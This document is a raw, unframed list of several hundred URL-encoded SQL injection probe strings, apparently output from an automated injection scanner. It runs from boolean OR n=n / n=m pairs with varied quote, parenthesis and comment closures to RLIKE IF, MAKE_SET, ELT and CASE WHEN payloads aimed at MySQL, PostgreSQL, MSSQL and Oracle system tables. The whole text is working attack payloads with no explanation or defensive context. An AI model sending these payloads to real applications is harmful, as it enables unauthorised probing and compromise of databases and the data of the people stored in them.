-4319%25%27%29%29%29%20OR%20%289129%3D4476%29%20AND%20%28%28%28%27%25%27%3D%27 -4117%25%27%29%29%29%20OR%20%288702%3D8702%29%20AND%20%28%28%28%27%25%27%3D%27 -2465%25%27%29%29%29%20OR%20%283901%3D8519%29%20AND%20%28%28%28%27%25%27%3D%27 -9617%25%27%20OR%20%283503%3D1921%29%20AND%20%27%25%27%3D%27 -9375%25%27%20OR%20%288702%3D8702%29%20AND%20%27%25%27%3D%27 -3670%25%27%20OR%20%281154%3D4072%29%20AND%20%27%25%27%3D%27 -8457%00%27%29%20OR%20%289059%3D9626%29%20AND%20%28%27pKfN%27%3D%27pKfN -7778%00%27%29%20OR%20%288702%3D8702%29%20AND%20%28%27HjlO%27%3D%27HjlO -7860%00%27%29%20OR%20%287686%3D5068%29%20AND%20%28%27FlJn%27%3D%27FlJn -6406%00%27%20OR%20%286466%3D8689%29%20AND%20%27DozD%27%3D%27DozD -1357%00%27%20OR%20%288702%3D8702%29%20AND%20%27HcNv%27%3D%27HcNv -5845%00%27%20OR%20%282004%3D4331%29%20AND%20%27Hcue%27%3D%27Hcue -5498%27%29%20WHERE%208687%3D8687%20OR%20%288793%3D9063%29%20--%20 -6399%27%29%20WHERE%209314%3D9314%20OR%20%288702%3D8702%29%20--%20 -3033%27%29%20WHERE%208611%3D8611%20OR%20%289894%3D2026%29%20--%20 -7580%22%29%20WHERE%207422%3D7422%20OR%20%285334%3D6653%29%20--%20 -5243%22%29%20WHERE%204407%3D4407%20OR%20%288702%3D8702%29%20--%20 -4635%22%29%20WHERE%209648%3D9648%20OR%20%281912%3D2309%29%20--%20 -1884%29%20WHERE%205917%3D5917%20OR%20%289253%3D1241%29%20--%20 -1835%29%20WHERE%202766%3D2766%20OR%20%288702%3D8702%29%20--%20 -2294%29%20WHERE%209830%3D9830%20OR%20%281541%3D5272%29%20--%20 -5939%27%20WHERE%205188%3D5188%20OR%20%289039%3D3540%29%20--%20 -2880%27%20WHERE%201712%3D1712%20OR%20%288702%3D8702%29%20--%20 -9346%27%20WHERE%205890%3D5890%20OR%20%284004%3D3359%29%20--%20 -6591%22%20WHERE%207755%3D7755%20OR%20%289203%3D5976%29%20--%20 -8626%22%20WHERE%209424%3D9424%20OR%20%288702%3D8702%29%20--%20 -9642%22%20WHERE%205502%3D5502%20OR%20%287803%3D6804%29%20--%20 -6304%20WHERE%203527%3D3527%20OR%20%288423%3D2338%29%20--%20 -7582%20WHERE%202102%3D2102%20OR%20%288702%3D8702%29%20--%20 -7959%20WHERE%204625%3D4625%20OR%20%287010%3D2153%29%20--%20 -4618%29%20OR%20%288750%3D5647%29%23 -5292%29%20OR%20%283893%3D3893%29%23 -4948%29%20OR%20%286332%3D3675%29%23 -9177%27%29%20OR%20%284435%3D9006%29%23 -8314%27%29%20OR%20%283893%3D3893%29%23 -6352%27%29%20OR%20%286998%3D5807%29%23 -6321%27%20OR%20%282198%3D9026%29%23 -5462%27%20OR%20%283893%3D3893%29%23 -2170%27%20OR%20%286034%3D6311%29%23 -9793%22%20OR%20%283897%3D6045%29%23 -3426%22%20OR%20%283893%3D3893%29%23 -3805%22%20OR%20%284262%3D8723%29%23 -5961%29%20OR%20%289752%3D6182%29%23 -8280%29%20OR%20%283893%3D3893%29%23 -4974%29%20OR%20%281052%3D5224%29%23 -8872%29%29%20OR%20%288121%3D7948%29%23 -5613%29%29%20OR%20%283893%3D3893%29%23 -1077%29%29%20OR%20%289314%3D7833%29%23 -5209%29%29%29%20OR%20%289295%3D4554%29%23 -8712%29%29%29%20OR%20%283893%3D3893%29%23 -2547%29%29%29%20OR%20%285723%3D1928%29%23 -1752%20OR%20%286509%3D5339%29%23 -2194%20OR%20%283893%3D3893%29%23 -8300%20OR%20%288923%3D1079%29%23 -4135%27%29%20OR%20%286448%3D4032%29%23 -9671%27%29%20OR%20%283893%3D3893%29%23 -1743%27%29%20OR%20%287411%3D5777%29%23 -8049%27%29%29%20OR%20%282702%3D8758%29%23 -5381%27%29%29%20OR%20%283893%3D3893%29%23 -2455%27%29%29%20OR%20%287188%3D5003%29%23 -3062%27%29%29%29%20OR%20%283556%3D1865%29%23 -4512%27%29%29%29%20OR%20%283893%3D3893%29%23 -1077%27%29%29%29%20OR%20%286581%3D9783%29%23 -8175%27%20OR%20%283331%3D3861%29%23 -5220%27%20OR%20%283893%3D3893%29%23 -6722%27%20OR%20%284958%3D5379%29%23 -9485%27%29%20OR%20%281357%3D6767%29%23 -7633%27%29%20OR%20%283893%3D3893%29%23 -4481%27%29%20OR%20%285962%3D3619%29%23 -2209%27%29%29%20OR%20%281367%3D9337%29%23 -8811%27%29%29%20OR%20%283893%3D3893%29%23 -7481%27%29%29%20OR%20%283918%3D9880%29%23 -1581%27%29%29%29%20OR%20%286428%3D6911%29%23 -5479%27%29%29%29%20OR%20%283893%3D3893%29%23 -6757%27%29%29%29%20OR%20%282758%3D6573%29%23 -7438%27%20OR%20%288414%3D4428%29%23 -1876%27%20OR%20%283893%3D3893%29%23 -8355%27%20OR%20%287770%3D7679%29%23 -6765%22%29%20OR%20%283104%3D9265%29%23 -7929%22%29%20OR%20%283893%3D3893%29%23 -3650%22%29%20OR%20%285640%3D6955%29%23 -5089%22%29%29%20OR%20%288654%3D3438%29%23 -8450%22%29%29%20OR%20%283893%3D3893%29%23 -4845%22%29%29%20OR%20%282011%3D3947%29%23 -4979%22%29%29%29%20OR%20%282117%3D5835%29%23 -9259%22%29%29%29%20OR%20%283893%3D3893%29%23 -5245%22%29%29%29%20OR%20%283918%3D6906%29%23 -3115%22%20OR%20%286436%3D7930%29%23 -7061%22%20OR%20%283893%3D3893%29%23 -6235%22%20OR%20%282352%3D4596%29%23 -2521%22%29%20OR%20%283619%3D2579%29%23 -8302%22%29%20OR%20%283893%3D3893%29%23 -4061%22%29%20OR%20%282689%3D6781%29%23 -5428%22%29%29%20OR%20%282869%3D1982%29%23 -6577%22%29%29%20OR%20%283893%3D3893%29%23 -5068%22%29%29%20OR%20%287704%3D2209%29%23 -3171%22%29%29%29%20OR%20%285858%3D8908%29%23 -5315%22%29%29%29%20OR%20%283893%3D3893%29%23 -2590%22%29%29%29%20OR%20%286501%3D9791%29%23 -2456%22%20OR%20%281861%3D2274%29%23 -6513%22%20OR%20%283893%3D3893%29%23 -8645%22%20OR%20%288317%3D9626%29%23 -7208%25%27%29%20OR%20%281434%3D5091%29%23 -4687%25%27%29%20OR%20%283893%3D3893%29%23 -2774%25%27%29%20OR%20%287156%3D3708%29%23 -5494%25%27%29%29%20OR%20%282676%3D8991%29%23 -7444%25%27%29%29%20OR%20%283893%3D3893%29%23 -9579%25%27%29%29%20OR%20%283640%3D4256%29%23 -9940%25%27%29%29%29%20OR%20%282894%3D6467%29%23 -6274%25%27%29%29%29%20OR%20%283893%3D3893%29%23 -2335%25%27%29%29%29%20OR%20%281285%3D9666%29%23 -1354%25%27%20OR%20%289158%3D1169%29%23 -6834%25%27%20OR%20%283893%3D3893%29%23 -1659%25%27%20OR%20%283162%3D6493%29%23 -7175%00%27%29%20OR%20%287169%3D4987%29%23 -9050%00%27%29%20OR%20%283893%3D3893%29%23 -4799%00%27%29%20OR%20%281570%3D6618%29%23 -2690%00%27%20OR%20%288916%3D9543%29%23 -1214%00%27%20OR%20%283893%3D3893%29%23 -8576%00%27%20OR%20%289770%3D6322%29%23 -8329%27%29%20WHERE%206986%3D6986%20OR%20%289913%3D1420%29%23 -5398%27%29%20WHERE%205973%3D5973%20OR%20%283893%3D3893%29%23 -9891%27%29%20WHERE%203669%3D3669%20OR%20%286655%3D5159%29%23 -8820%22%29%20WHERE%203362%3D3362%20OR%20%281041%3D6401%29%23 -9650%22%29%20WHERE%209743%3D9743%20OR%20%283893%3D3893%29%23 -9753%22%29%20WHERE%207119%3D7119%20OR%20%288043%3D2830%29%23 -9295%29%20WHERE%206539%3D6539%20OR%20%283522%3D9409%29%23 -3133%29%20WHERE%201816%3D1816%20OR%20%283893%3D3893%29%23 -5821%29%20WHERE%207744%3D7744%20OR%20%281295%3D3399%29%23 -1676%27%20WHERE%206170%3D6170%20OR%20%286083%3D4119%29%23 -2551%27%20WHERE%205598%3D5598%20OR%20%283893%3D3893%29%23 -7980%27%20WHERE%204310%3D4310%20OR%20%287860%3D2706%29%23 -6509%22%20WHERE%201557%3D1557%20OR%20%284125%3D9510%29%23 -8865%22%20WHERE%209019%3D9019%20OR%20%283893%3D3893%29%23 -6799%22%20WHERE%201845%3D1845%20OR%20%287562%3D5992%29%23 -3701%20WHERE%204701%3D4701%20OR%20%283657%3D9614%29%23 -2495%20WHERE%202941%3D2941%20OR%20%283893%3D3893%29%23 -2485%20WHERE%202331%3D2331%20OR%20%289458%3D5300%29%23 -5319%29%20OR%20%281035%3D8325%29--%20 -7429%29%20OR%20%289863%3D9863%29--%20 -7267%29%20OR%20%281090%3D7030%29--%20 -8405%27%29%20OR%20%284004%3D7496%29--%20 -2588%27%29%20OR%20%289863%3D9863%29--%20 -6563%27%29%20OR%20%287778%3D7076%29--%20 -3673%27%20OR%20%288976%3D3024%29--%20 -5683%27%20OR%20%289863%3D9863%29--%20 -2989%27%20OR%20%285381%3D5742%29--%20 -6093%22%20OR%20%288236%3D5711%29--%20 -1223%22%20OR%20%289863%3D9863%29--%20 -7510%22%20OR%20%283311%3D8440%29--%20 -6255%29%20OR%20%281944%3D1457%29--%20 -6256%29%20OR%20%289863%3D9863%29--%20 -9064%29%20OR%20%285666%3D6781%29--%20 -9128%29%29%20OR%20%285577%3D9665%29--%20 -3521%29%29%20OR%20%289863%3D9863%29--%20 -7263%29%29%20OR%20%287266%3D3281%29--%20 -9876%29%29%29%20OR%20%282626%3D2173%29--%20 -8178%29%29%29%20OR%20%289863%3D9863%29--%20 -8871%29%29%29%20OR%20%284644%3D5454%29--%20 -6336%20OR%20%282169%3D6978%29--%20 -5197%20OR%20%289863%3D9863%29--%20 -3515%20OR%20%288474%3D4564%29--%20 -3894%27%29%20OR%20%283682%3D5360%29--%20 -7282%27%29%20OR%20%289863%3D9863%29--%20 -7136%27%29%20OR%20%281195%3D3947%29--%20 -6588%27%29%29%20OR%20%281656%3D8965%29--%20 -8558%27%29%29%20OR%20%289863%3D9863%29--%20 -6490%27%29%29%20OR%20%288753%3D5484%29--%20 -3959%27%29%29%29%20OR%20%287272%3D9557%29--%20 -2887%27%29%29%29%20OR%20%289863%3D9863%29--%20 -2214%27%29%29%29%20OR%20%287898%3D7882%29--%20 -6460%27%20OR%20%281384%3D7858%29--%20 -1032%27%20OR%20%289863%3D9863%29--%20 -4822%27%20OR%20%287582%3D9075%29--%20 -4640%27%29%20OR%20%288832%3D4348%29--%20 -1022%27%29%20OR%20%289863%3D9863%29--%20 -6812%27%29%20OR%20%282046%3D1841%29--%20 -7339%27%29%29%20OR%20%283164%3D6214%29--%20 -7528%27%29%29%20OR%20%289863%3D9863%29--%20 -5433%27%29%29%20OR%20%283285%3D8903%29--%20 -6747%27%29%29%29%20OR%20%283356%3D3335%29--%20 -3881%27%29%29%29%20OR%20%289863%3D9863%29--%20 -4267%27%29%29%29%20OR%20%284550%3D2403%29--%20 -6073%27%20OR%20%286197%3D2016%29--%20 -2139%27%20OR%20%289863%3D9863%29--%20 -3181%27%20OR%20%285466%3D3868%29--%20 -3441%22%29%20OR%20%283779%3D6575%29--%20 -6077%22%29%20OR%20%289863%3D9863%29--%20 -2444%22%29%20OR%20%284925%3D8628%29--%20 -7258%22%29%29%20OR%20%289198%3D5659%29--%20 -8273%22%29%29%20OR%20%289863%3D9863%29--%20 -2842%22%29%29%20OR%20%287618%3D9105%29--%20 -8439%22%29%29%29%20OR%20%289826%3D6678%29--%20 -4656%22%29%29%29%20OR%20%289863%3D9863%29--%20 -6660%22%29%29%29%20OR%20%282695%3D9046%29--%20 -3373%22%20OR%20%287274%3D2417%29--%20 -3057%22%20OR%20%289863%3D9863%29--%20 -6347%22%20OR%20%285900%3D7588%29--%20 -9959%22%29%20OR%20%287139%3D6530%29--%20 -5154%22%29%20OR%20%289863%3D9863%29--%20 -4303%22%29%20OR%20%284465%3D5428%29--%20 -7586%22%29%29%20OR%20%286862%3D8678%29--%20 -3810%22%29%29%20OR%20%289863%3D9863%29--%20 -4323%22%29%29%20OR%20%288818%3D6754%29--%20 -5178%22%29%29%29%20OR%20%281021%3D4524%29--%20 -9021%22%29%29%29%20OR%20%289863%3D9863%29--%20 -3059%22%29%29%29%20OR%20%289680%3D6505%29--%20 -1283%22%20OR%20%286750%3D8910%29--%20 -7506%22%20OR%20%289863%3D9863%29--%20 -6487%22%20OR%20%282624%3D4079%29--%20 -1561%25%27%29%20OR%20%288593%3D4803%29--%20 -7346%25%27%29%20OR%20%289863%3D9863%29--%20 -8188%25%27%29%20OR%20%285520%3D5465%29--%20 -3240%25%27%29%29%20OR%20%283979%3D1155%29--%20 -2834%25%27%29%29%20OR%20%289863%3D9863%29--%20 -7723%25%27%29%29%20OR%20%288088%3D9220%29--%20 -4775%25%27%29%29%29%20OR%20%288978%3D1452%29--%20 -4001%25%27%29%29%29%20OR%20%289863%3D9863%29--%20 -1616%25%27%29%29%29%20OR%20%283399%3D7089%29--%20 -5828%25%27%20OR%20%283500%3D1131%29--%20 -8372%25%27%20OR%20%289863%3D9863%29--%20 -5782%25%27%20OR%20%284205%3D7046%29--%20 -6003%00%27%29%20OR%20%284621%3D6846%29--%20 -3546%00%27%29%20OR%20%289863%3D9863%29--%20 -1510%00%27%29%20OR%20%286320%3D5630%29--%20 -3310%00%27%20OR%20%281887%3D7268%29--%20 -1433%00%27%20OR%20%289863%3D9863%29--%20 -9088%00%27%20OR%20%287798%3D6641%29--%20 -9523%27%29%20WHERE%202548%3D2548%20OR%20%285353%3D9990%29--%20 -6372%27%29%20WHERE%207169%3D7169%20OR%20%289863%3D9863%29--%20 -5749%27%29%20WHERE%205452%3D5452%20OR%20%288057%3D4844%29--%20 -9601%22%29%20WHERE%209536%3D9536%20OR%20%284301%3D5065%29--%20 -2140%22%29%20WHERE%208130%3D8130%20OR%20%289863%3D9863%29--%20 -9016%22%29%20WHERE%209183%3D9183%20OR%20%281075%3D5840%29--%20 -4380%29%20WHERE%206390%3D6390%20OR%20%282523%3D4623%29--%20 -3933%29%20WHERE%207846%3D7846%20OR%20%289863%3D9863%29--%20 -9921%29%20WHERE%209991%3D9991%20OR%20%284970%3D9722%29--%20 -1062%27%20WHERE%204960%3D4960%20OR%20%282839%3D6420%29--%20 -9701%27%20WHERE%205032%3D5032%20OR%20%289863%3D9863%29--%20 -9497%27%20WHERE%208957%3D8957%20OR%20%285321%3D6540%29--%20 -4807%22%20WHERE%201236%3D1236%20OR%20%284470%3D3772%29--%20 -5091%22%20WHERE%206098%3D6098%20OR%20%289863%3D9863%29--%20 -5619%22%20WHERE%208242%3D8242%20OR%20%285086%3D5890%29--%20 -6990%20WHERE%201591%3D1591%20OR%20%285405%3D7290%29--%20 -4798%20WHERE%202460%3D2460%20OR%20%289863%3D9863%29--%20 -3172%20WHERE%205122%3D5122%20OR%20%281883%3D6516%29--%20 1234.5%29%20RLIKE%20IF%287701%3D8099%2C0x313233342e35%2C0x28%29 1234.5%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29 1234.5%27%29%20RLIKE%20IF%282339%3D6675%2C0x313233342e35%2C0x28%29 1234.5%27%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29 1234.5%27%20RLIKE%20IF%284754%3D2722%2C0x313233342e35%2C0x28%29 1234.5%27%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29 1234.5%22%20RLIKE%20IF%282011%3D9482%2C0x313233342e35%2C0x28%29 1234.5%22%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29 1234.5%29%20RLIKE%20IF%281077%3D8564%2C0x313233342e35%2C0x28%29%20AND%20%286467%3D6467 1234.5%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%284026%3D4026 1234.5%29%29%20RLIKE%20IF%282826%3D2802%2C0x313233342e35%2C0x28%29%20AND%20%28%285271%3D5271 1234.5%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%283403%3D3403 1234.5%29%29%29%20RLIKE%20IF%286344%3D8010%2C0x313233342e35%2C0x28%29%20AND%20%28%28%283986%3D3986 1234.5%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%284425%3D4425 1234.5%20RLIKE%20IF%289393%3D5130%2C0x313233342e35%2C0x28%29 1234.5%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29 1234.5%27%29%20RLIKE%20IF%289878%3D6160%2C0x313233342e35%2C0x28%29%20AND%20%28%27WDNo%27%3D%27WDNo 1234.5%27%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%27Excj%27%3D%27Excj 1234.5%27%29%29%20RLIKE%20IF%285363%3D4341%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27WrXI%27%3D%27WrXI 1234.5%27%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27APtS%27%3D%27APtS 1234.5%27%29%29%29%20RLIKE%20IF%283556%3D5754%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27Xeel%27%3D%27Xeel 1234.5%27%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27szGM%27%3D%27szGM 1234.5%27%20RLIKE%20IF%289721%3D7141%2C0x313233342e35%2C0x28%29%20AND%20%27Hphb%27%3D%27Hphb 1234.5%27%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%27qhLn%27%3D%27qhLn 1234.5%27%29%20RLIKE%20IF%283283%3D6918%2C0x313233342e35%2C0x28%29%20AND%20%28%27icPR%27%20LIKE%20%27icPR 1234.5%27%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%27eHFh%27%20LIKE%20%27eHFh 1234.5%27%29%29%20RLIKE%20IF%284833%3D2653%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27hcmH%27%20LIKE%20%27hcmH 1234.5%27%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27cBnk%27%20LIKE%20%27cBnk 1234.5%27%29%29%29%20RLIKE%20IF%288431%3D6307%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27zdjN%27%20LIKE%20%27zdjN 1234.5%27%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27QYEn%27%20LIKE%20%27QYEn 1234.5%27%20RLIKE%20IF%283235%3D8254%2C0x313233342e35%2C0x28%29%20AND%20%27evZE%27%20LIKE%20%27evZE 1234.5%27%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%27cWQf%27%20LIKE%20%27cWQf 1234.5%22%29%20RLIKE%20IF%286449%3D5438%2C0x313233342e35%2C0x28%29%20AND%20%28%22BsNu%22%3D%22BsNu 1234.5%22%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%22cXSY%22%3D%22cXSY 1234.5%22%29%29%20RLIKE%20IF%282452%3D2730%2C0x313233342e35%2C0x28%29%20AND%20%28%28%22PjgV%22%3D%22PjgV 1234.5%22%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%22TgjB%22%3D%22TgjB 1234.5%22%29%29%29%20RLIKE%20IF%289029%3D9280%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%22ePiP%22%3D%22ePiP 1234.5%22%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%22RJHQ%22%3D%22RJHQ 1234.5%22%20RLIKE%20IF%289101%3D6985%2C0x313233342e35%2C0x28%29%20AND%20%22gXkM%22%3D%22gXkM 1234.5%22%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%22TnBM%22%3D%22TnBM 1234.5%22%29%20RLIKE%20IF%283718%3D3535%2C0x313233342e35%2C0x28%29%20AND%20%28%22vaWt%22%20LIKE%20%22vaWt 1234.5%22%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%22EBxz%22%20LIKE%20%22EBxz 1234.5%22%29%29%20RLIKE%20IF%289681%3D1276%2C0x313233342e35%2C0x28%29%20AND%20%28%28%22auLC%22%20LIKE%20%22auLC 1234.5%22%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%22ktsY%22%20LIKE%20%22ktsY 1234.5%22%29%29%29%20RLIKE%20IF%281537%3D4829%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%22lqqP%22%20LIKE%20%22lqqP 1234.5%22%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%22wAZi%22%20LIKE%20%22wAZi 1234.5%22%20RLIKE%20IF%281762%3D2338%2C0x313233342e35%2C0x28%29%20AND%20%22RuCu%22%20LIKE%20%22RuCu 1234.5%22%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%22Vxkn%22%20LIKE%20%22Vxkn 1234.5%25%27%29%20RLIKE%20IF%283544%3D1532%2C0x313233342e35%2C0x28%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20RLIKE%20IF%283658%3D4085%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20RLIKE%20IF%286918%3D7975%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20RLIKE%20IF%282707%3D6077%2C0x313233342e35%2C0x28%29%20AND%20%27%25%27%3D%27 1234.5%25%27%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20RLIKE%20IF%282547%3D8047%2C0x313233342e35%2C0x28%29%20AND%20%28%27GNfT%27%3D%27GNfT 1234.5%00%27%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%28%27uBoB%27%3D%27uBoB 1234.5%00%27%20RLIKE%20IF%283050%3D1317%2C0x313233342e35%2C0x28%29%20AND%20%27zcze%27%3D%27zcze 1234.5%00%27%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20AND%20%27KhKR%27%3D%27KhKR 1234.5%27%29%20WHERE%202964%3D2964%20RLIKE%20IF%283898%3D3418%2C0x313233342e35%2C0x28%29%20--%20 1234.5%27%29%20WHERE%206109%3D6109%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%22%29%20WHERE%205607%3D5607%20RLIKE%20IF%286812%3D2681%2C0x313233342e35%2C0x28%29%20--%20 1234.5%22%29%20WHERE%207255%3D7255%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%29%20WHERE%209346%3D9346%20RLIKE%20IF%282206%3D3802%2C0x313233342e35%2C0x28%29%20--%20 1234.5%29%20WHERE%209866%3D9866%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%27%20WHERE%206766%3D6766%20RLIKE%20IF%289790%3D2156%2C0x313233342e35%2C0x28%29%20--%20 1234.5%27%20WHERE%209159%3D9159%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%22%20WHERE%202522%3D2522%20RLIKE%20IF%282575%3D2699%2C0x313233342e35%2C0x28%29%20--%20 1234.5%22%20WHERE%206357%3D6357%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%20WHERE%205375%3D5375%20RLIKE%20IF%287442%3D1827%2C0x313233342e35%2C0x28%29%20--%20 1234.5%20WHERE%209229%3D9229%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27fasW%27%20FROM%20DUAL%20WHERE%203473%3D3473%20RLIKE%20IF%284606%3D5306%2C0x313233342e35%2C0x28%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27ciTw%27%20FROM%20DUAL%20WHERE%206777%3D6777%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27ntug%27%20WHERE%206019%3D6019%20RLIKE%20IF%281875%3D7483%2C0x313233342e35%2C0x28%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27CKqc%27%20WHERE%201432%3D1432%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20wJsa%20WHERE%207826%3D7826%20RLIKE%20IF%283550%3D2379%2C0x313233342e35%2C0x28%29%20%29%2B%27 1234.5%27%2B%28SELECT%20dsWN%20WHERE%201583%3D1583%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27enqR%27%20WHERE%205850%3D5850%20RLIKE%20IF%289994%3D2995%2C0x313233342e35%2C0x28%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27pxZs%27%20WHERE%204470%3D4470%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%283441%3D7820%2C0x313233342e35%2C0x28%29%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20RLIKE%20IF%288248%3D8248%2C0x313233342e35%2C0x28%29%20%23 %28SELECT%20%28CASE%20WHEN%20%287914%3D3277%29%20THEN%20%271234.5%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%283130%3D3130%29%20THEN%20%271234.5%27%20ELSE%201%2F%28SELECT%200%29%20END%29%29 MAKE_SET%285561%3D9280%2C0x313233342e35%29 MAKE_SET%282236%3D2236%2C0x313233342e35%29 ELT%287233%3D7920%2C0x313233342e35%29 ELT%286477%3D6477%2C0x313233342e35%29 %285330%3D3588%29%2A0x313233342e35 %287275%3D7275%29%2A0x313233342e35 %28SELECT%20%28CASE%20WHEN%20%289607%3D8399%29%20THEN%200x313233342e35%20ELSE%209607%2A%28SELECT%209607%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%289977%3D9977%29%20THEN%200x313233342e35%20ELSE%209977%2A%28SELECT%209977%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281367%3D4552%29%20THEN%200x313233342e35%20ELSE%201367%2A%28SELECT%201367%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%285210%3D5210%29%20THEN%200x313233342e35%20ELSE%205210%2A%28SELECT%205210%20FROM%20mysql.db%29%20END%29%29 %28SELECT%20GENERATE_SERIES%28%28CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%29%2C%28CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%29%2CCASE%20WHEN%20%282854%3D9252%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20GENERATE_SERIES%28%28CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%29%2C%28CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%29%2CCASE%20WHEN%20%289475%3D9475%29%20THEN%201%20ELSE%200%20END%29%20LIMIT%201%29 %28SELECT%20%28CASE%20WHEN%20%283961%3D1944%29%20THEN%20CHAR%2849%29%2BCHAR%2850%29%2BCHAR%2851%29%2BCHAR%2852%29%2BCHAR%2846%29%2BCHAR%2853%29%20ELSE%203961%2A%28SELECT%203961%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%283290%3D3290%29%20THEN%20CHAR%2849%29%2BCHAR%2850%29%2BCHAR%2851%29%2BCHAR%2852%29%2BCHAR%2846%29%2BCHAR%2853%29%20ELSE%203290%2A%28SELECT%203290%20FROM%20master..sysdatabases%29%20END%29%29 %28SELECT%20%28CASE%20WHEN%20%281159%3D3389%29%20THEN%20CHR%2849%29%7C%7CCHR%2850%29%7C%7CCHR%2851%29%7C%7CCHR%2852%29%7C%7CCHR%2846%29%7C%7CCHR%2853%29%20ELSE%201%2F%28SELECT%200%20FROM%20DUAL%29%20END%29%20FROM%20DUAL%29 